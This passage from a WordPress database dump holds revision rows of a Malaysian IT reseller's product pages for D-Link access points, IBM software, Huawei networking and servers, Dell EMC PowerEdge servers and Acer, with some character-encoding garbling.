Gigabit PoE-capable LAN port\r\n\r\nâ€¢ AP Array utility support\r\n\r\nâ€¢ Free D-Link Central WiFiManager\r\n\r\n[maxbutton id=\"1\" ]</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2360\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg\" alt=\"\" width=\"510\" height=\"600\" />\r\n\r\n2.4GHz Wireless N300 Outdoor Access Point\r\n\r\n&nbsp;\r\n\r\n- Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through\r\n\r\n- Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion\r\n\r\n- Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage\r\n\r\n- Weather-proof design (IPX6) built to withstand harsh environments\r\n\r\n- Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater\r\n\r\n- Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic\r\n\r\n- Provides WLAN partitioning for deployments such as wireless hot spots\r\n\r\n[maxbutton id=\"1\" ]</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2361\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png\" alt=\"\" width=\"510\" height=\"600\" />\r\n\r\nAC1750 Wireless Dual-Band PoE Access Point\r\n\r\n&nbsp;\r\n\r\nâ€¢ Up to 1750 MBPS high-speed wireless performance on 802.11ac standards\r\n\r\nâ€¢ Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band\r\n\r\nâ€¢ Support load balancing to ensure maximum performance by limiting userÂ  per AP\r\n\r\nâ€¢ Support Wi-Fi Multimedia QoS for audio, video, and voice applications\r\n\r\nâ€¢ Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band\r\n\r\nâ€¢ Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet\r\n\r\nâ€¢ Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client\r\n\r\nâ€¢ RuggedÂ  metal housing &amp;Â  Plenum-rated chassis\r\n\r\nâ€¢ Built in Radius ServerÂ  allowing users to create their accounts within the device itself.\r\n\r\n[maxbutton id=\"1\" ]</td>\r\n</tr>\r\n<tr>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2362\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png\" alt=\"\" width=\"510\" height=\"600\" />\r\n\r\nN600 Wireless Dual-Band PoE Access Point\r\n\r\n&nbsp;\r\n\r\nâ€¢ Simultaneous Dual Band Connectivity for high performance\r\n\r\nâ€¢ SupportÂ  up toÂ  300 Mbps speedÂ  in both 2.4 GHz and 5 GHz band\r\n\r\nâ€¢ Gigabit Ethernet port with 802.3af Power over Ethernet support\r\n\r\nâ€¢ Support Multiple operation mode â€“ AP, Client, WDS, WDS with AP\r\n\r\nâ€¢ Equipped with Rugged Metal &amp; Plenum-rated housing\r\n\r\nâ€¢ Built in Radius server and support Network Access Protection (NAP)\r\n\r\nâ€¢ Support Rogue AP Detection, Wireless Broadcast Scheduling\r\n\r\nâ€¢ Support Central Wi-Fi Manager to configure and manage multiple AP\r\n\r\n[maxbutton id=\"1\" ]</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2363\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg\" alt=\"\" width=\"510\" height=\"600\" />\r\n\r\nAC1300 Wireless Dual-Band PoE Access Point\r\n\r\n&nbsp;\r\n\r\nEnjoy High-performance Wireless Connectivity\r\n\r\nâ€“ Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications\r\n\r\nMU-MIMO with Beamforming\r\n\r\nâ€“ Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network\r\n\r\nMultiple Operational Modes\r\n\r\n-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client\r\n\r\n[maxbutton id=\"1\" ]</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2364\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg\" alt=\"\" width=\"510\" height=\"600\" />\r\n\r\nN300 Wireless PoE Access Point\r\n\r\n&nbsp;\r\n\r\nâ€¢ High-speed wireless performance with 300 Mbps wireless signal rates\r\n\r\nâ€¢ Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications\r\n\r\nâ€¢ Gigabit Ethernet port with 802.3af Power over Ethernet\r\n\r\nâ€¢ Multiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client\r\n\r\nâ€¢ Support Inbuilt Radius server, Network Access protection (NAP)\r\n\r\nâ€¢ Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation\r\n\r\nâ€¢ Support Central WiFi Manager to configure and manage multiple AP\r\n\r\n[maxbutton id=\"1\" ]</td>\r\n</tr>\r\n</tbody>\r\n</table>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2018-12-18 13:01:26','2018-12-18 05:01:26','',1480,'https://bintara.com.my/blog/2018/12/18/1480-revision-v1/',0,'revision','',0),(3642,1,'2019-10-02 16:45:37','2019-10-02 08:45:37','<h2 style=\"text-align: center;\">IBM Software</h2><h4 style=\"text-align: center;\">IBM Business Solution</h4><h3 style=\"text-align: center;\"><strong>IBM Sterling Commerce</strong></h3><p style=\"text-align: center;\">Use eCommerce, connectivity and integration to deliver personalized retail experiences</p><h3 style=\"text-align: center;\"><strong>IBM Coremetrics</strong></h3><p style=\"text-align: center;\">Analyze data from customer behavior to uncover trends and insights for targeted marketing</p><h3 style=\"text-align: center;\"><strong>IBM Unica</strong></h3><p style=\"text-align: center;\">Deliver single, personalized experiences across channels to increase customer engagement</p><h3 style=\"text-align: center;\"><strong>IBM Tealeaf</strong></h3><p style=\"text-align: center;\">Explore digital customer experience management and customer behavior analysis solutions</p>		\n		<h2 style=\"text-align: center;\">IBM Software</h2><h4 style=\"text-align: center;\">IBM IT Infrastructure</h4><h3 style=\"text-align: center;\"><strong>IBM WebSphere Application Server</strong></h3><p style=\"text-align: center;\">Develop next generation Java apps in the cloud and pay as you go</p><h3 style=\"text-align: center;\"><strong>IBM MQ</strong></h3><p style=\"text-align: center;\">Accelerate the integration of applications and business data across multiple platforms</p><h3 style=\"text-align: center;\"><strong>IBM and Apache Spark</strong></h3><p style=\"text-align: center;\">Create algorithms and speed analytics applications to gain insights from complex data</p><h3 style=\"text-align: center;\"><strong>IBM Spectrum Protect</strong></h3><p style=\"text-align: center;\">Protect and recover data for virtual, physical, cloud and software-defined environments</p><h3 style=\"text-align: center;\"><strong>IBM z/OS Connect Enterprise Edition</strong></h3><p style=\"text-align: center;\">Develop efficient and scalable RESTful APIs for mobile and cloud apps</p><h3 style=\"text-align: center;\"><strong>IBM UrbanCode Deploy</strong></h3><p style=\"text-align: center;\">Automate the application deployment process to accelerate time to market</p><h3 style=\"text-align: center;\"><strong>CICS</strong></h3><p style=\"text-align: center;\">Use high-performance enterprise application servers for Z Systems with support for a range of languages</p><h3 style=\"text-align: center;\"><strong>IBM Information Management System (IMS)</strong></h3><p style=\"text-align: center;\">Explore a fast and security-rich hierarchical database manager for OLTP</p>		\n		<h2 style=\"text-align: center;\">IBM Software</h2><h4 style=\"text-align: center;\">IBM Analytics</h4><h3 style=\"text-align: center;\"><strong>IBM Cognos Analytics on Cloud</strong></h3><p style=\"text-align: center;\">Uncover new insights quickly and easily with automated data analysis, automatic visualization and predictive analytics</p><h3 style=\"text-align: center;\"><strong>IBM SPSS</strong></h3><p style=\"text-align: center;\">Get deeper, more meaningful insights from your data and predict what is likely to happen next</p><h3 style=\"text-align: center;\"><strong>IBM Maximo</strong></h3><p style=\"text-align: center;\">Manage physical assets on a common platform for better asset lifecycle and maintenance management</p><h3 style=\"text-align: center;\"><strong>IBM DB2 on Cloud</strong></h3><p style=\"text-align: center;\">Explore no-boundaries database software for the digital, cloud and cognitive era</p><p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>','IBM','','inherit','closed','closed','','1530-revision-v1','','','2019-10-02 16:45:37','2019-10-02 08:45:37','',1530,'https://bintara.com.my/blog/2019/10/02/1530-revision-v1/',0,'revision','',0),(2375,1,'2018-12-18 17:09:18','2018-12-18 09:09:18','<h3>Enterprise Wireless</h3>\r\n<h4>Intelligent Wireless Connections, Building Digital Industries</h4>\r\nWhat Are the Benefits of the Enterprise Wireless?\r\n<ul>\r\n 	<li>Multiple Services on One Network</li>\r\n 	<li>Industrial-Grade Reliability</li>\r\n 	<li>Access Anytime and Anywhere</li>\r\n</ul>\r\nHuawei uses leading 4.5G wireless technologies and its in-depth understanding of industry customers to provide the eLTE Multimedia Critical Communications System (MCCS) Solution, the 4.5G-based eLTE narrowband and broadband integrated wireless IoT solution, and the GSM-R solution for a wide range of services, such as narrowband, broadband, voice, multimedia, fixed, and mobile. Huawei also builds a professional and reliable mobile communications platform for diverse industry applications, such as professional trunking voice, wireless video surveillance, broadband data access, mass data collection, railway wireless dispatching, and high-speed train control.\r\n<h3></h3>\r\n<h3 class=\"title\">Enterprise Routers</h3>\r\n<div class=\"sub-title\">\r\n\r\nRouters with large-capacity, high-reliability, easy O&amp;M, and low power consumption help enterprises in various industries to quickly achieve digital transformation.\r\n<h4>NE Series Routers</h4>\r\n<div class=\"txtbox mask-gradient\">\r\n\r\nHighest performance routers to power innovative enterprise applications from small to super huge scale. Carrier-grade reliability, flexible modular architecture, and energy-efficient technologies add up to great service at lowest TCO.\r\n<h4>ME60 Series</h4>\r\n<div class=\"txtbox mask-gradient\">\r\n\r\n2T hardware platform, providing 10G to 480G line cards (including 160G CGN line cards), supporting a maximum of 256K concurrent users and allowing 1,200 users to go online per second.\r\n<h4>PTN 7900 Series</h4>\r\n<div class=\"txtbox mask-gradient\">\r\n\r\nThe OptiX PTN 7900 NE is a new-generation high-capacity, high-bandwidth, and software-defined core device that supports smart services.\r\n<h4>AR502 Series IoT Gateways</h4>\r\n<div class=\"txtbox mask-gradient\">\r\n\r\nThe AR502 uses the built-in industrial-grade LTE module, and offers high bandwidth and low-latency wireless access. It provides various local interfaces and applies to a number of IoT fields, such as smart grid, smart city, and smart building.\r\n<h4>AR1200 Series Enterprise Routers</h4>\r\n<div class=\"txtbox mask-gradient\">\r\n\r\nThe AR1200 is a multi-service router designed for Small and Medium-sized Enterprises (SMEs). It provides Internet access, dedicated line access, and voice, security, and wireless functions. It can be deployed at the egress of small and medium-sized campus networks and the headquarters and branches of SMEs.\r\n\r\n</div>\r\n<h3></br></h3>\r\n<h3>Why Huawei Routers?</h3>\r\n<h4>Leading Market Share</h4>\r\nHuawei routers ranked No. 1 in China and No. 2 in the global market, and 70% of carriers and enterprise network NAs use them.\r\n<h4>Strong Development Capabilities</h4>\r\nHuawei is a leader and outstanding contributor in the IP standards field. Its proprietary Solar chipset had large-scale commercial use on the live network in 2013 and more than 3 million chips were delivered, and the Huawei-proprietary VRP software is the culmination of 17 years of innovation.\r\n<h4>Award Winning Products</h4>\r\nHuawei routers have won multiple international awards, including SDN-VDC InfoVision award and Japanâ€™s Interop gold award, and they have obtained certification from multiple third-party authoritative organizations worldwide.\r\n\r\n&nbsp;\r\n<div class=\"txtbox mask-gradient\">\r\n<h3 class=\"title\">Switches</h3>\r\n<div class=\"sub-title\">For a wide variety of applications and networkÂ sizes, fromÂ cloud data centers to campus networks</div>\r\n</div>\r\n<div>\r\n<h5></h5>\r\n<h4>Campus Switches</h4>\r\n<div class=\"txtbox mask-gradient\">\r\n\r\nHuaweiâ€™s self-developed, innovative data center, campus, and carrier switch portfolios help accelerate your digital transformation.\r\n<h4>Data Center Switches</h4>\r\n<div class=\"txtbox mask-gradient\">\r\n\r\nCloudEngine series switches offer carrier-grade reliability, virtualization support, iStack clustering, and Software-Defined Networking features for building and scaling data centers and campus networks. They provide versatility and resilient performance for server-based multimedia applications, Big Data analytics, and cloud computing.\r\n<h3></h3>\r\n<h3>Why Huawei Switches?</h3>\r\n<h4>Diversified Products and Solutions</h4>\r\nHuawei provides the most complete portfolio of data center network and campus products, supporting customers business requirements for digital transformation and enabling their rapid growth of virtualization, Big Data, and cloud services.\r\n<h4>Extensive Customer Cases</h4>\r\nHuawei switches have been deployed for enterprises in more than 150 countries and are widely used in sectors such as finance, Internet, retail, education, manufacturing, and public services. Huaweiâ€™s data center network and wired and wireless convergence solutions are rated as Challenger and Visionary in Gartnerâ€™s Magic Quadrant, respectively.\r\n<h4>Many Global Channels and Localized Services</h4>\r\nHuawei switches support tens of thousands of channels and partners in 150 countries, providing innovative switch solutions in all industries and localized services.\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Huawei','','inherit','closed','closed','','1534-revision-v1','','','2018-12-18 17:09:18','2018-12-18 09:09:18','',1534,'https://bintara.com.my/blog/2018/12/18/1534-revision-v1/',0,'revision','',0),(2367,1,'2018-12-18 15:03:11','2018-12-18 07:03:11','<h3 class=\"heading\">Servers built for today\'s most demanding workloads. And tomorrow\'s.</h3>\r\n<div class=\"rte \">\r\n\r\nPowerEdge MX powers both traditional and emerging workloads with up to 5x network throughput,Â simple unified management and multigenerational investment protection.\r\n<h4></h4>\r\n<h4>Rack Servers</h4>\r\nReady your data center to handle any workload. PowerEdge rack servers combine a highly scalable architecture and optimum balance of compute and memory to maximize performance across the widest range of applications.\r\n<ul>\r\n 	<li>World record in SAP performance11</li>\r\n 	<li>Widest range of in-server storage options ever in PowerEdge servers</li>\r\n 	<li>IT Pro â€œEditorâ€™s Choiceâ€ award with 5-star ratings (R640 &amp; R740xd)</li>\r\n 	<li>#1 in price/performance (R740xd)24</li>\r\n 	<li>Powerful 4-socket performance and GPU acceleration for data analytics, AI and machine learning</li>\r\n</ul>\r\n<h4></h4>\r\n<h4>Modular Infrastructure</h4>\r\nCreate an agile, future-ready data center with flexible, easily expandable compute, networking and storage. The PowerEdge modular portfolio allows you to precisely tailor, quickly deploy and easily manage infrastructure while lowering operating costs.\r\n<ul>\r\n 	<li>PowerEdge MX â€“ Modular, integrated solution with easy deployment, management, and maximum longevity</li>\r\n 	<li>PowerEdge FX Series â€“ Hybrid platform with the density of blade servers and the simplicity of rack-based systems</li>\r\n 	<li>PowerEdge VRTX â€“ Compact chassis integrating servers, storage, networking and management</li>\r\n 	<li>PowerEdge C Series â€“ Accelerated computing platform for high-performance cognitive workloads</li>\r\n</ul>\r\n<h4></h4>\r\n<h4>Tower Servers</h4>\r\nPowerEdge tower servers are designed to grow with your organization, at your pace.\r\n<ul>\r\n 	<li>Flexible configurations with large internal capacities</li>\r\n 	<li>Broad portfolio for SOHO, ROBO and SMB markets</li>\r\n 	<li>Rackable for continued use as companies grow</li>\r\n</ul>\r\n<h4>Systems Management Software</h4>\r\n<div class=\"info-text server-info-text\">\r\n\r\nTake control and automate the full IT lifecycle with the OpenManage portfolio. Increase the productivity, reliability and cost effectiveness of your servers while making IT operations more efficient.\r\n<ul class=\"server-list\">\r\n 	<li>Powerful infrastructure automation with OpenManage Enterprise</li>\r\n 	<li>Anytime, anywhere access to PowerEdge server status with OpenManage Mobile</li>\r\n 	<li>Leverage existing management consoles with OpenManage Integrations for VMware vCenter<sup>Â®</sup>, Microsoft<sup>Â®</sup>Â System Center and Ansible Modules</li>\r\n</ul>\r\n<h4></h4>\r\n<h4 class=\"title\">Industrial-Grade Servers</h4>\r\nThe new PowerEdge XR2 server delivers long life for harsh or space-constrained environments, without compromising on performance.\r\n<ul class=\"server-list\">\r\n 	<li>Secure storage â€“ Up to 8 high-capacity SSDs with up to 30TB of storage</li>\r\n 	<li>Shock certified to 40G of operational shock with SSDs<sup>29</sup></li>\r\n 	<li>Extreme temperature range â€“ Cold start down to -15Â°C and up to 45Â°C with excursions up to 55Â°C for 8 hours at a time</li>\r\n</ul>\r\n</div>\r\n<h4></h4>\r\n<h4>Ready Nodes</h4>\r\n<div class=\"info-text server-info-text\">\r\n\r\nBuild or scale with PowerEdge servers pre-configured for your workloads.\r\n<ul class=\"server-list\">\r\n 	<li>Known-good configurations for VMware vSAN, Microsoft Storage Spaces Direct, VxFlex and SAP HANA</li>\r\n 	<li>Save time on configuration and testing</li>\r\n 	<li>Solution-level customer support included</li>\r\n</ul>\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>','Dell EMC','','inherit','closed','closed','','1478-revision-v1','','','2018-12-18 15:03:11','2018-12-18 07:03:11','',1478,'https://bintara.com.my/blog/2018/12/18/1478-revision-v1/',0,'revision','',0),(2369,1,'2018-12-18 15:22:16','2018-12-18 07:22:16','Laptop and desktop PCs, tablets, smartphones, monitors, projectors and cloud solutions. <a href=\"http://bintara.com.my/acer\">Read More...</a><!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1716\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Acer-Logo.jpg\" alt=\"\" width=\"1024\" height=\"681\" />','ACER','','inherit','closed','closed','','1323-autosave-v1','','','2018-12-18 15:22:16','2018-12-18 07:22:16','',1323,'https://bintara.com.my/blog/2018/12/18/1323-autosave-v1/',0,'revision','',0),(2374,1,'2018-12-18 17:08:35','2018-12-18 09:08:35','<h3>Enterprise Wireless</h3>\r\n<h4>Intelligent Wireless Connections, Building Digital Industries</h4>\r\nWhat Are the Benefits of the Enterprise Wireless?\r\n<ul>\r\n 	<li>Multiple Services on One Network</li>\r\n 	<li>Industrial-Grade Reliability</li>\r\n 	<li>Access Anytime and Anywhere</li>\r\n</ul>\r\nHuawei uses leading 4.5G wireless technologies and its in-depth understanding of industry customers to provide the eLTE Multimedia Critical Communications System (MCCS) Solution, the 4.5G-based eLTE narrowband and broadband integrated wireless IoT solution, and the GSM-R solution for a wide range of services, such as narrowband, broadband, voice, multimedia, fixed, and mobile. Huawei also builds a professional and reliable mobile communications platform for diverse industry applications, such as professional trunking voice, wireless video surveillance, broadband data access, mass data collection, railway wireless dispatching, and high-speed train control.\r\n<h3></h3>\r\n<h3 class=\"title\">Enterprise Routers</h3>\r\n<div class=\"sub-title\">\r\n\r\nRouters with large-capacity, high-reliability, easy O&amp;M, and low power consumption help enterprises in various industries to quickly achieve digital transformation.\r\n<h4>NE Series Routers</h4>\r\n<div class=\"txtbox mask-gradient\">\r\n\r\nHighest performance routers to power innovative enterprise applications from small to super huge scale. Carrier-grade reliability, flexible modular architecture, and energy-efficient technologies add up to great service at lowest TCO.\r\n<h4>ME60 Series</h4>\r\n<div class=\"txtbox mask-gradient\">\r\n\r\n2T hardware platform, providing 10G to 480G line cards (including 160G CGN line cards), supporting a maximum of 256K concurrent users and allowing 1,200 users to go online per second.\r\n<h4>PTN 7900 Series</h4>\r\n<div class=\"txtbox mask-gradient\">\r\n\r\nThe OptiX PTN 7900 NE is a new-generation high-capacity, high-bandwidth, and software-defined core device that supports smart services.\r\n<h4>AR502 Series IoT Gateways</h4>\r\n<div class=\"txtbox mask-gradient\">\r\n\r\nThe AR502 uses the built-in industrial-grade LTE module, and offers high bandwidth and low-latency wireless access. It provides various local interfaces and applies to a number of IoT fields, such as smart grid, smart city, and smart building.\r\n<h4>AR1200 Series Enterprise Routers</h4>\r\n<div class=\"txtbox mask-gradient\">\r\n\r\nThe AR1200 is a multi-service router designed for Small and Medium-sized Enterprises (SMEs). It provides Internet access, dedicated line access, and voice, security, and wireless functions. It can be deployed at the egress of small and medium-sized campus networks and the headquarters and branches of SMEs.\r\n\r\n</div>\r\n<h3></h3>\r\n<h3>Why Huawei Routers?</h3>\r\n<h4>Leading Market Share</h4>\r\nHuawei routers ranked No. 1 in China and No. 2 in the global market, and 70% of carriers and enterprise network NAs use them.\r\n<h4>Strong Development Capabilities</h4>\r\nHuawei is a leader and outstanding contributor in the IP standards field. Its proprietary Solar chipset had large-scale commercial use on the live network in 2013 and more than 3 million chips were delivered, and the Huawei-proprietary VRP software is the culmination of 17 years of innovation.\r\n<h4>Award Winning Products</h4>\r\nHuawei routers have won multiple international awards, including SDN-VDC InfoVision award and Japanâ€™s Interop gold award, and they have obtained certification from multiple third-party authoritative organizations worldwide.\r\n\r\n&nbsp;\r\n<div class=\"txtbox mask-gradient\">\r\n<h3 class=\"title\">Switches</h3>\r\n<div class=\"sub-title\">For a wide variety of applications and networkÂ sizes, fromÂ cloud data centers to campus networks</div>\r\n</div>\r\n<div>\r\n<h5></h5>\r\n<h4>Campus Switches</h4>\r\n<div class=\"txtbox mask-gradient\">\r\n\r\nHuaweiâ€™s self-developed, innovative data center, campus, and carrier switch portfolios help accelerate your digital transformation.\r\n<h4>Data Center Switches</h4>\r\n<div class=\"txtbox mask-gradient\">\r\n\r\nCloudEngine series switches offer carrier-grade reliability, virtualization support, iStack clustering, and Software-Defined Networking features for building and scaling data centers and campus networks. They provide versatility and resilient performance for server-based multimedia applications, Big Data analytics, and cloud computing.\r\n<h3></br></h3>\r\n<h3>Why Huawei Switches?</h3>\r\n<h4>Diversified Products and Solutions</h4>\r\nHuawei provides the most complete portfolio of data center network and campus products, supporting customers business requirements for digital transformation and enabling their rapid growth of virtualization, Big Data, and cloud services.\r\n<h4>Extensive Customer Cases</h4>\r\nHuawei switches have been deployed for enterprises in more than 150 countries and are widely used in sectors such as finance, Internet, retail, education, manufacturing, and public services. Huaweiâ€™s data center network and wired and wireless convergence solutions are rated as Challenger and Visionary in Gartnerâ€™s Magic Quadrant, respectively.\r\n<h4>Many Global Channels and Localized Services</h4>\r\nHuawei switches support tens of thousands of channels and partners in 150 countries, providing innovative switch solutions in all industries and localized services.\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Huawei','','inherit','closed','closed','','1534-revision-v1','','','2018-12-18 17:08:35','2018-12-18 09:08:35','',1534,'https://bintara.com.my/blog/2018/12/18/1534-revision-v1/',0,'revision','',0),(2376,1,'2018-12-18 17:21:33','2018-12-18 09:21:33','<h3>Enterprise Wireless</h3>\r\n<h4>Intelligent Wireless Connections, Building Digital Industries</h4>\r\nWhat Are the Benefits of the Enterprise Wireless?\r\n<ul>\r\n 	<li>Multiple Services on One Network</li>\r\n 	<li>Industrial-Grade Reliability</li>\r\n 	<li>Access Anytime and Anywhere</li>\r\n</ul>\r\nHuawei uses leading 4.5G wireless technologies and its in-depth understanding of industry customers to provide the eLTE Multimedia Critical Communications System (MCCS) Solution, the 4.5G-based eLTE narrowband and broadband integrated wireless IoT solution, and the GSM-R solution for a wide range of services, such as narrowband, broadband, voice, multimedia, fixed, and mobile. Huawei also builds a professional and reliable mobile communications platform for diverse industry applications, such as professional trunking voice, wireless video surveillance, broadband data access, mass data collection, railway wireless dispatching, and high-speed train control.\r\n<h3></h3>\r\n&nbsp;\r\n<h3 class=\"title\">Enterprise Routers</h3>\r\n<div class=\"sub-title\">\r\n\r\nRouters with large-capacity, high-reliability, easy O&amp;M, and low power consumption help enterprises in various industries to quickly achieve digital transformation.\r\n<h4>NE Series Routers</h4>\r\n<div class=\"txtbox mask-gradient\">\r\n\r\nHighest performance routers to power innovative enterprise applications from small to super huge scale. Carrier-grade reliability, flexible modular architecture, and energy-efficient technologies add up to great service at lowest TCO.\r\n<h4>ME60 Series</h4>\r\n<div class=\"txtbox mask-gradient\">\r\n\r\n2T hardware platform, providing 10G to 480G line cards (including 160G CGN line cards), supporting a maximum of 256K concurrent users and allowing 1,200 users to go online per second.\r\n<h4>PTN 7900 Series</h4>\r\n<div class=\"txtbox mask-gradient\">\r\n\r\nThe OptiX PTN 7900 NE is a new-generation high-capacity, high-bandwidth, and software-defined core device that supports smart services.\r\n<h4>AR502 Series IoT Gateways</h4>\r\n<div class=\"txtbox mask-gradient\">\r\n\r\nThe AR502 uses the built-in industrial-grade LTE module, and offers high bandwidth and low-latency wireless access. It provides various local interfaces and applies to a number of IoT fields, such as smart grid, smart city, and smart building.\r\n<h4>AR1200 Series Enterprise Routers</h4>\r\n<div class=\"txtbox mask-gradient\">\r\n\r\nThe AR1200 is a multi-service router designed for Small and Medium-sized Enterprises (SMEs). It provides Internet access, dedicated line access, and voice, security, and wireless functions. It can be deployed at the egress of small and medium-sized campus networks and the headquarters and branches of SMEs.\r\n\r\n</div>\r\n<h3></h3>\r\n&nbsp;\r\n<h3>Why Huawei Routers?</h3>\r\n<h4>Leading Market Share</h4>\r\nHuawei routers ranked No. 1 in China and No. 2 in the global market, and 70% of carriers and enterprise network NAs use them.\r\n<h4>Strong Development Capabilities</h4>\r\nHuawei is a leader and outstanding contributor in the IP standards field. Its proprietary Solar chipset had large-scale commercial use on the live network in 2013 and more than 3 million chips were delivered, and the Huawei-proprietary VRP software is the culmination of 17 years of innovation.\r\n<h4>Award Winning Products</h4>\r\nHuawei routers have won multiple international awards, including SDN-VDC InfoVision award and Japanâ€™s Interop gold award, and they have obtained certification from multiple third-party authoritative organizations worldwide.\r\n\r\n&nbsp;\r\n<div class=\"txtbox mask-gradient\">\r\n<h3 class=\"title\">Switches</h3>\r\n<div class=\"sub-title\">For a wide variety of applications and networkÂ sizes, fromÂ cloud data centers to campus networks</div>\r\n</div>\r\n<div>\r\n<h5></h5>\r\n<h4>Campus Switches</h4>\r\n<div class=\"txtbox mask-gradient\">\r\n\r\nHuaweiâ€™s self-developed, innovative data center, campus, and carrier switch portfolios help accelerate your digital transformation.\r\n<h4>Data Center Switches</h4>\r\n<div class=\"txtbox mask-gradient\">\r\n\r\nCloudEngine series switches offer carrier-grade reliability, virtualization support, iStack clustering, and Software-Defined Networking features for building and scaling data centers and campus networks. They provide versatility and resilient performance for server-based multimedia applications, Big Data analytics, and cloud computing.\r\n<h3></h3>\r\n&nbsp;\r\n<h3>Why Huawei Switches?</h3>\r\n<h4>Diversified Products and Solutions</h4>\r\nHuawei provides the most complete portfolio of data center network and campus products, supporting customers business requirements for digital transformation and enabling their rapid growth of virtualization, Big Data, and cloud services.\r\n<h4>Extensive Customer Cases</h4>\r\nHuawei switches have been deployed for enterprises in more than 150 countries and are widely used in sectors such as finance, Internet, retail, education, manufacturing, and public services. Huaweiâ€™s data center network and wired and wireless convergence solutions are rated as Challenger and Visionary in Gartnerâ€™s Magic Quadrant, respectively.\r\n<h4>Many Global Channels and Localized Services</h4>\r\nHuawei switches support tens of thousands of channels and partners in 150 countries, providing innovative switch solutions in all industries and localized services.\r\n<h3></h3>\r\n&nbsp;\r\n<h3 class=\"title\">Servers - Intelligent Computing</h3>\r\n<div class=\"sub-title\">\r\n\r\nBoundless Computing Inspires an Intelligent Digital World.\r\n<h4>FusionServer 2488H V5 Rack Server</h4>\r\n<div class=\"txtbox mask-gradient\">\r\n\r\nThe FusionServer 2488H V5 is Huaweiâ€™s latest 2U 4-socket rack server. It is ideal for compute-intensive scenarios such as virtualization, High-Performance Computing (HPC), database, and SAP HANA.\r\n<h4>TaiShan 2280 ARM Server</h4>\r\n<div class=\"txtbox mask-gradient\">\r\n\r\nA 2U, 2-socket rack server powered by Huawei 64-bit ARMv8 Hi1616 processors that provides high performance with low power consumption.\r\n<h4>FusionServer G5500 Data Center Heterogeneous Server</h4>\r\n<div class=\"txtbox mask-gradient\">\r\n\r\nFusionServer G5500 is a heterogeneous server positioned for data center deployment. It offers the best-in-class heterogeneous computing platform for scenarios such as Artificial Intelligence (AI), HPC, intelligent cloud, video analytics, and database acceleration.\r\n<h4>Huawei FusionCube HCI</h4>\r\n<div class=\"txtbox mask-gradient\">\r\n\r\nHuawei FusionCube HCI (Hyper-Converged Infrastructure) is an IT platform based on a hyper-converged architecture. It complies with open architecture standards, converges compute and storage, and pre-integrates distributed storage engines, virtualization, and cloud management software, allowing for resource-on-demand provisioning and linear expansion.FusionCube HCI supports various hardware form factors including blade, high-density, and rack, meeting the flexible configuration requirements of different services for compute, storage, and I/O resources. The FusionCube HCI applies to cloud computing scenarios and is an ideal choice for deploying the IT infrastructure of cloud data centers.\r\n<h4>KunLun Mission Critical Server</h4>\r\n<div class=\"txtbox mask-gradient\">\r\n\r\nKunLun is designed for mission-critical workloads and is ideal for core databases, database application consolidation, in-memory computing, High-Performance Computing (HPC) fat nodes, and more scenarios. With innovative RAS 2.0 technology, the server offers an open x86 ecosystem with the reliability of UNIX servers, helping customers move from closed to open architecture and unlock innovation potential.\r\n<h4>FX-Series FPGA Accelerator Cards</h4>\r\n<div class=\"txtbox mask-gradient\">These accelerator cards provide high-performance compute power and high-bandwidth data connections, making them ideal for hardware-accelerated services.</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div>\r\n\r\n&nbsp;\r\n<h3>Why Huawei Servers?</h3>\r\n<h4>Efficient and Reliable</h4>\r\nTo ensure that we meet customer requirements for servers, Huawei implements stringent quality control across eight processes, including product planning, R&amp;D, supply chain management, and post-sales service. Before delivery, each product has undergone more than 2,000 hardware tests, 10,000 software tests, and 300 entry certifications.\r\n<h4>Continuous Innovation</h4>\r\nHuaweiâ€™s Boundless Computing strategy accelerates innovation at the chip level across computing, storage, and networking technologies, moving enterprise intelligence toward a better-connected, smart world. Huawei has focused its years of R&amp;D development efforts by setting up global OpenLabs to collaborate with top partners.\r\n<h4>Trustworthy</h4>\r\nHuawei successfully cooperates with customers and technology partners, striving to provide open computing infrastructure that supports optimal customer and partner outcomes. With solid reliability, excellent performance, and easy integration, Huawei servers are used by more than 5,000 customers worldwide in more than 25 sectors.\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Huawei','','inherit','closed','closed','','1534-revision-v1','','','2018-12-18 17:21:33','2018-12-18 